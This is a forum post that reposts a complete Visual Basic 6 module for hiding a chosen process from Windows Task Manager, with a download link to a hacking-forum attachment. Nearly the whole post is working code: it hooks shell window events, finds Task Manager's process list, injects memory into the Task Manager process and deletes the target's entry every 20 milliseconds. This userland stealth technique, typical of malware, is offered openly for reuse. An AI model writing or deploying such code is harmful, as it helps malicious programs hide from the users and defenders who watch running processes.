Jump to content
Nytro

[VB6] HideProcess without Driver

By Nytro, in Programare

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[VB6] HideProcess without Driver

Author:

[h=3]f0rce[/h]

Credits:

Mrfrog

SqUeEzEr

Attribute VB_Name = "mHideProcess"
'---------------------------------------------------------------------------------------
' Module       : mHideProcess                                                          '
' Author       : f0rce                                                                 '
' Credits      : Very Big Thanks to SqUeEzEr & Mrfrog                                  '
' Mail         : f0rce@hotmail.de                                                      '
' Published    : 17/03/2011                                                            '
' Purpose      : Hide a Process without Driver or other things                         '
'                Compile in P-Code then it works                                       '
'                                                                                      '
' License      : You can use this code in your own applications, share the source...   '
'                Don't forget to leave credits or assume you're an asshole.            '
'---------------------------------------------------------------------------------------

Option Explicit
Option Base 0

'// @kernel32.dll
Private Declare Function CloseHandle Lib "Kernel32.dll" (ByVal hObject As Long) As Long
Private Declare Function OpenProcess Lib "Kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Long, ByVal dwProcId As Long) As Long
Private Declare Function VirtualFreeEx Lib "Kernel32.dll" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function VirtualAllocEx Lib "Kernel32.dll" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteProcessMemory Lib "Kernel32.dll" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Public Declare Function GetLastError Lib "kernel32" () As Integer

'// @user32.dll
Private Declare Function SetTimer Lib "user32.dll" (ByVal Hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As Long
Private Declare Function KillTimer Lib "user32.dll" (ByVal Hwnd As Long, ByVal nIDEvent As Long) As Long
Private Declare Function FindWindowA Lib "user32.dll" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function SendMessageA Lib "user32.dll" (ByVal Hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function GetClassNameA Lib "user32.dll" (ByVal Hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Private Declare Function SetWindowLongA Lib "user32.dll" (ByVal Hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function CallWindowProcA Lib "user32.dll" (ByVal lpPrevWndFunc As Long, ByVal Hwnd As Long, ByVal msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function EnumChildWindows Lib "user32.dll" (ByVal hWndParent As Long, ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Private Declare Function RegisterWindowMessageW Lib "user32.dll" (ByVal lpString As Long) As Long
Private Declare Function RegisterShellHookWindow Lib "user32.dll" (ByVal Hwnd As Long) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal Hwnd As Long, lpdwProcessId As Long) As Long
Private Declare Function DeregisterShellHookWindow Lib "user32.dll" (ByVal Hwnd As Long) As Long

'// Types
Private Type POINTAPI
    x           As Long
    y           As Long
End Type

Private Type LVFINDINFO
    flags       As Long
    psz         As Long
    lParam      As Long
    pt          As POINTAPI
    vkDirection As Long
End Type


'// Consts
Private Const LISTVIEW_CLASSNAME$ = "SysListView32"
Private Const TASKMANAGER_CLASSNAME$ = "#32770"

Private Const MEM_COMMIT& = &H1000
Private Const MEM_RESERVE& = &H2000
Private Const MEM_RELEASE& = &H8000&

Private Const GWL_WNDPROC& = -&H4&

Private Const PAGE_READWRITE& = &H4&

Private Const LVFI_WRAP& = &H20
Private Const LVM_FIRST = &H1000
Private Const LVM_FINDITEM = (LVM_FIRST + 13)
Private Const LVM_DELETEITEM& = &H1008

Private Const PROCESS_VM_READ& = &H10
Private Const PROCESS_VM_WRITE& = &H20
Private Const PROCESS_VM_OPERATION& = &H8

Private Const HSHELL_WINDOWCREATED& = &H1
Private Const HSHELL_WINDOWDESTROYED& = &H2

Private Const LVM_GETITEMTEXT = (&H1000 + 45)

'// Variables
Private lngLVHWND&
Private lngWinHook&
Private lngReferenceHwnd&
Private WM_SHELLHOOKMESSAGE&
Dim bytProcess2Hide() As Byte

Public Sub StartHideProcessHook(ByVal lngRefHwnd&, ByRef strProcessName$)
Dim lngTskMngrHwnd&

    If lngRefHwnd And LenB(strProcessName) > 0 Then
        If lngWinHook = 0 Then
            Debug.Print "Hook Started -> "; Time$

            bytProcess2Hide = StrConv(strProcessName, vbFromUnicode)
            lngReferenceHwnd = lngRefHwnd

            lngTskMngrHwnd = FindWindowA(TASKMANAGER_CLASSNAME, vbNullString)
            If lngTskMngrHwnd Then
                StartFindLV lngTskMngrHwnd
            End If

            WM_SHELLHOOKMESSAGE = RegisterWindowMessageW(StrPtr("SHELLHOOK"))
            lngWinHook = SetWindowLongA(lngReferenceHwnd, GWL_WNDPROC, AddressOf WinProc)
            RegisterShellHookWindow lngReferenceHwnd
        End If
    End If
End Sub

Public Sub StopHideProcessHook()
    If lngReferenceHwnd Then
        If lngWinHook Then
            Debug.Print "Hook Stoped -> "; Time$

            SetWindowLongA lngReferenceHwnd, GWL_WNDPROC, lngWinHook
            DeregisterShellHookWindow lngReferenceHwnd

            StopTimer
            lngWinHook = 0
        End If
    End If
End Sub

Private Function WinProc(ByVal Hwnd&, ByVal uMsg&, ByVal wParam&, ByVal lParam&) As Long
    If uMsg = WM_SHELLHOOKMESSAGE Then
        Select Case wParam
            Case HSHELL_WINDOWCREATED
                Debug.Print "New Window -> Classname: "; GetWinClassName(lParam), " -> "; Time$

                If GetWinClassName(lParam) = TASKMANAGER_CLASSNAME Then
                    StartFindLV lParam

                    'Debug.Print "TaskManager Open -> "; Time$
                End If
            Case HSHELL_WINDOWDESTROYED
                'Debug.Print "Window Closed -> Classname: "; GetWinClassName(lParam), " -> "; Time$

                If GetWinClassName(lParam) = TASKMANAGER_CLASSNAME Then
                    '// SetTimer = False
                    StopTimer
                'Debug.Print "TaskManager Closed -> "; Time$
                End If
        End Select
    End If

    WinProc = CallWindowProcA(lngWinHook, Hwnd, uMsg, wParam, lParam)
End Function

Private Sub TimerProc(ByVal lngHwnd&, ByVal nIDEvent&, ByVal uElapse&, ByVal lpTimerFunc&)
    HideProcess
End Sub

Private Sub StartFindLV(ByVal lngHwnd&)
    EnumChildWindows lngHwnd, AddressOf SearchListView, 1
End Sub

Private Function SearchListView(ByVal lngHwnd&, ByVal lParam&) As Boolean

    If GetWinClassName(lngHwnd) = LISTVIEW_CLASSNAME Then
        Debug.Print "LV finded -> "; Time$

        lngLVHWND = lngHwnd

        '// SetTimer = True
        SetTimer lngReferenceHwnd, 0, 20, AddressOf TimerProc
    Else
        SearchListView = True
    End If
End Function

Private Function GetWinClassName(ByVal lngHwnd&) As String
Dim lngRet&

    GetWinClassName = String$(&H100, vbNullChar)
    lngRet = GetClassNameA(lngHwnd, GetWinClassName, &H100)
    GetWinClassName = Left$(GetWinClassName, lngRet)
End Function

Private Sub StopTimer()
    KillTimer lngReferenceHwnd, 0
End Sub

Private Sub HideProcess()
Dim pHandle As Long, ProcessID As Long
Dim pStrBufferMemory As Long, pMyItemMemory As Long
Dim LFI As LVFINDINFO, lWritten As Long
Dim a As Long

    If lngLVHWND = 0 Then Exit Sub

    GetWindowThreadProcessId lngLVHWND, ProcessID

    pHandle = OpenProcess(&H1F0FFF, False, ProcessID)

    pMyItemMemory = VirtualAllocEx(pHandle, 0&, LenB(LFI) + 513, &H1000, &H40)

    LFI.flags = LVFI_WRAP
    LFI.psz = pMyItemMemory + Len(LFI)

    Call WriteProcessMemory(pHandle, ByVal pMyItemMemory, ByVal VarPtr(LFI), Len(LFI), ByVal VarPtr(lWritten))
    Call WriteProcessMemory(pHandle, ByVal (pMyItemMemory + Len(LFI)), ByVal VarPtr(bytProcess2Hide(0)), UBound(bytProcess2Hide) + 1, lWritten)
    a = SendMessageA(lngLVHWND, LVM_FINDITEM, -1, ByVal pMyItemMemory)

    If a > -1 Then SendMessageA lngLVHWND, &H1000 + 8, a, 0&

    VirtualFreeEx pHandle, pMyItemMemory, 0&, MEM_RELEASE
    CloseHandle pHandle
End Sub

Userland hooking.

Download:

http://www.hackhound.org/forum/index.php?app=core&module=attach&section=attach&attach_id=11183

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...